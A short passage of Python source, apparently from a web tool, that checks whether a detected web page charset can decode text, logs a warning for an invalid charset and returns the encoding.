        # SystemExit are not swallowed here
        encoding = None

    if encoding:
        # Probe that the codec is really able to decode some content
        try:
            six.text_type(getBytes(randomStr()), encoding)
        except Exception:
            if warn:
                warnMsg = "invalid web page charset '%s'" % encoding
                singleTimeLogMessage(warnMsg, logging.WARN, encoding)
            encoding = None

    return encoding